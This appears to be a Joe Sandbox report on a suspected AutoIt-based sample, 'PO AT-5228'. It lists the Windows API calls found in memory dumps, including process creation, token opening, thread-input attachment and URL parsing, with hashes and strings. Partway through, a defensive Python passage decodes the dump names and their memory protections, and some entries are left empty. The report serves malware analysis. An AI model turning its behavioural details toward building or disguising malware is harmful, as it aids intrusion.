                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: 05840ec933c1804e56ac52fb4e1a9729509e7304acee6a3240ec41e5d2f7351c
                                                                                        • Instruction ID: effb8123f6923aa4d102eb4e8118069218fa856e99f744d378eab56b45f69034
                                                                                        • Opcode Fuzzy Hash: 05840ec933c1804e56ac52fb4e1a9729509e7304acee6a3240ec41e5d2f7351c
                                                                                        • Instruction Fuzzy Hash: F7015B32A8A6219BD712BF64944979DBBE0BF05729F288085F824677B0CF34D941CFD6
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B87AD8
                                                                                          • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                                                          • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B87AE5
                                                                                        • __lock.LIBCMT ref: 00B87AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 00B87B17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1687444384-0
                                                                                        • Opcode ID: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                                                        • Instruction ID: 9f20b1c94d89d781968bf15b2f46de333242ee6072fba21794a3900796bd9adb
                                                                                        • Opcode Fuzzy Hash: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                                                        • Instruction Fuzzy Hash: C3016D71445B00DFD721EF75D90674AB7F0EF40325F20898EA49A972B0CFB0A680CB55
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BCE33D
                                                                                        • _memset.LIBCMT ref: 00BCE34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C23D00,00C23D44), ref: 00BCE37B
                                                                                        • CloseHandle.KERNEL32 ref: 00BCE38D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                                                        • Instruction ID: d8157af3c08d6dd9344dbbea2b7fcd31dc1a9c8fe81d3fa290bc8f37d51cbf42
                                                                                        • Opcode Fuzzy Hash: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                                                        • Instruction Fuzzy Hash: B5F089F1670394BEE7102760AC45F7B7E9CD704754F004421FF04DA5A2DBB99D0187A8
                                                                                        APIs
                                                                                          • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                                                          • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00BCEA9B
                                                                                        • EndPath.GDI32(00000000), ref: 00BCEAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 00BCEAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B9C864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00B9C86B
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00B9B0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B9AC9D), ref: 00B9B0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0F1
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00B7B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00B7B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00B7B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00B7B4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00BDDE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BDDE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00BDDE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00BDDE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00BDDE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00BDDE95
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B9B2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00B9B2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9B2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9B2FC
                                                                                          • Part of subcall function 00B9AB24: GetProcessHeap.KERNEL32(00000000,?,00B9A848), ref: 00B9AB2B
                                                                                          • Part of subcall function 00B9AB24: HeapFree.KERNEL32(00000000), ref: 00B9AB32
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00B9DEAA
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00B7BCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00B7BCF3
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        APIs
                                                                                          • Part of subcall function 00B644ED: __fread_nolock.LIBCMT ref: 00B6450B
                                                                                        • _wcscmp.LIBCMT ref: 00BAC65D
                                                                                        • _wcscmp.LIBCMT ref: 00BAC670
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                                                        • Instruction ID: 7ba15900f76a225c7bdc9b35868065f1694869d18b2dc71da8e20a6ac3d04883
                                                                                        • Opcode Fuzzy Hash: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                                                        • Instruction Fuzzy Hash: F841A772A0420A7BDF11EAA4DC42FEF7BF9EF4A714F0004A9F515A7181DB759A04C751
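The dump names quoted under each "Memory Dump Source" entry on this page are not opaque: their dot-separated hex fields carry the region's base address, its page protection and its memory type, which is how a reader tells the code section apart from the data sections when matching a `ref:` address to a dump. The following Python is an added illustration, not Joe Sandbox code, and parses the six names listed above. The field layout (process.run.dumpid.base.protect.field6.type.field8) is my reading of the names and is an assumption, not a documented format; the fifth field is mapped to winnt.h PAGE_* values and the seventh to MEM_* values because the values on this page (0x20, 0x02, 0x04, 0x1000000) match those constants exactly, while fields six and eight are kept raw because the page gives no basis for interpreting them.

```python
"""Parse Joe Sandbox memory-dump (.sdmp) file names as listed under
"Memory Dump Source" in this report.  Added illustration, not Joe Sandbox
code; the field layout is an assumption read off the names on the page."""
import re
from dataclasses import dataclass
from typing import List, Optional

# winnt.h page-protection values (low byte of MEMORY_BASIC_INFORMATION.Protect)
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h memory-type values (MEMORY_BASIC_INFORMATION.Type)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.run.dumpid.base.protect.field6.type.field8.sdmp
# Fields 6 and 8 are not interpreted (no basis on the page for their meaning).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<run>[0-9a-fA-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<prot>[0-9a-fA-F]{8})\.(?P<f6>[0-9a-fA-F]{8})\."
    r"(?P<mtype>[0-9a-fA-F]{8})\.(?P<f8>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    run: int
    dump_id: int
    base: int
    protect: int
    mem_type: int
    raw_field6: str
    raw_field8: str

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD (0x100) / PAGE_NOCACHE (0x200).
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xF0) != 0          # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return (self.protect & 0xCC) != 0          # READWRITE / WRITECOPY variants


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"unrecognised .sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16), run=int(m["run"], 16),
        dump_id=int(m["dump"]), base=int(m["base"], 16),
        protect=int(m["prot"], 16), mem_type=int(m["mtype"], 16),
        raw_field6=m["f6"], raw_field8=m["f8"],
    )


def region_map(names: List[str]) -> List[DumpRegion]:
    """All dumped regions sorted by base address, so the layout is visible."""
    return sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base)


def executable_regions(names: List[str]) -> List[DumpRegion]:
    return [r for r in region_map(names) if r.executable]


def region_for_address(names: List[str], addr: int) -> Optional[DumpRegion]:
    """Dump that a `ref:` address from the report falls in.  Approximation:
    each region is taken to extend to the next dumped base (last one unbounded)."""
    regions = region_map(names)
    for i, r in enumerate(regions):
        end = regions[i + 1].base if i + 1 < len(regions) else None
        if r.base <= addr and (end is None or addr < end):
            return r
    return None


# The six dump names quoted under "Memory Dump Source" in this report.
REPORT_DUMPS = [
    "00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for r in region_map(REPORT_DUMPS):
        flags = ("X" if r.executable else "-") + ("W" if r.writable else "-")
        print(f"{r.base:#010x}  {flags}  {r.protect_name:<22} {r.mem_type_name}")
    hit = region_for_address(REPORT_DUMPS, 0x00BAC65D)   # _wcscmp ref in the entry above
    print("0x00BAC65D lies in", f"{hit.base:#x}" if hit else "no dumped region")
```

Run against the names on this page, the only executable region is the PAGE_EXECUTE_READ dump at 0xB61000, and every `ref:` address in these entries (0xB6xxxx through 0xBCxxxx) falls inside it, below the read-only dump at 0xBED000; the single PAGE_READWRITE dump at 0xC1A000 is the image's writable data. All six carry MEM_IMAGE, which agrees with the report's "based on PE: true" and points to a normally mapped module rather than a privately allocated, writable-and-executable blob; a region that came out both W and X, or MEM_PRIVATE, would be the one to look at first for injected code.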
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BCA85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BCA86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                                                        • Instruction ID: c3d8b2546cb517dc6af670bb23bd43466a086a64d8f9139de9ed45a35ec95ce9
                                                                                        • Opcode Fuzzy Hash: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                                                        • Instruction Fuzzy Hash: 7E41E574E012099FDB14CF68D881FDABBF9FB08304F1441AAE905AB781D770A942CFA1
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BB5190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00BB51C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                                                        • Instruction ID: b0b72e062d2f6d421c67c9fb5557d7ed4b9aafaefda0b696c484f2fe1c1d0c3a
                                                                                        • Opcode Fuzzy Hash: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                                                        • Instruction Fuzzy Hash: 5A313B71C01119ABCF11EFA4CC85AEEBFB9FF14740F004095F815A6166DB75A946CBA0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00BC980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BC984A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: a67bec1370ecf4aa981dc6ca88e8d94a22a380f260fe5df8234d86d0af66ebbc
                                                                                        • Instruction ID: f4a7d9d4213ef8265b51b307fb722376dc4b546b1d7b38ce2a38646a757d393f
                                                                                        • Opcode Fuzzy Hash: a67bec1370ecf4aa981dc6ca88e8d94a22a380f260fe5df8234d86d0af66ebbc
                                                                                        • Instruction Fuzzy Hash: AC316A71110604AEEB109F68CC85FBB73E9FF59760F00865DF9A9D7190DA31AC81D760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA51C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BA5201
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: eba35198a61a988ced39cf707369d945eee58685bf29ef97fb3009b0432d5cc7
                                                                                        • Instruction ID: 5301bbdf81168545c6bdb0ec315b99e5a3299112632a3c99999435a3ae6e1667
                                                                                        • Opcode Fuzzy Hash: eba35198a61a988ced39cf707369d945eee58685bf29ef97fb3009b0432d5cc7
                                                                                        • Instruction Fuzzy Hash: E031E471608705EFEB34CF99D885BAEBBF4EF86350F1440A9E985A61A0D7749B44CB10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        • Opcode ID: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                                                        • Instruction ID: 1f4bd8c21acc0f972a280cd8739daa15dacab767a539ebe6d04727e53115ee30
                                                                                        • Opcode Fuzzy Hash: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                                                        • Instruction Fuzzy Hash: 27215E71600219ABCF24EF64C882AFD77F4AF46744F0004A9F505AB152DBB8EE55DBA1
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BC945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC9467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                                                        • Instruction ID: cf1abf8c82ffaaa69c05a0f3166fde518574ee3a4127e2d7b0738e6439edbba4
                                                                                        • Opcode Fuzzy Hash: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                                                        • Instruction Fuzzy Hash: 71119DB1210208AFFF259E54DC84FAB37AAEB883A4F104169F9189B2A0D6719C528760
                                                                                        APIs
                                                                                          • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                          • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                          • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BC9968
                                                                                        • GetSysColor.USER32(00000012), ref: 00BC9982
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                                                        • Instruction ID: 288971fd73bf1d9f7cd23400b71f4a76ece510bec9676fe402a88fe7f9e0afc9
                                                                                        • Opcode Fuzzy Hash: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                                                        • Instruction Fuzzy Hash: E5114772520209AFDB04DFB8C849EEA7BE8EB08354F05462CF955E3150D674E850DB60
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00BC9699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BC96A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                                                        • Instruction ID: 1cde8aad448a40141391778449cd7763763cf8f9d2e29d107cded5d704173612
                                                                                        • Opcode Fuzzy Hash: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                                                        • Instruction Fuzzy Hash: 80116A71500108ABFB119FA4DC88FEB3BAAEB153B8F504368FA65971E0C771DC519760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA52D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BA52F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
